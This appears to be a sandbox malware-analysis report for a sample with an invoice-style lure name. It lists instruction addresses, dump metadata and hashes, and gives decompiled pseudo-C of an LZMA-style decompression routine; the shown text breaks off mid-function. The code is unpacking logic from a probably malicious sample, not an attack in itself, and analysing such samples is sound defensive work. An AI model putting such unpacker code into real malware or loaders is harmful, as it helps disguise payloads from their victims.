0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
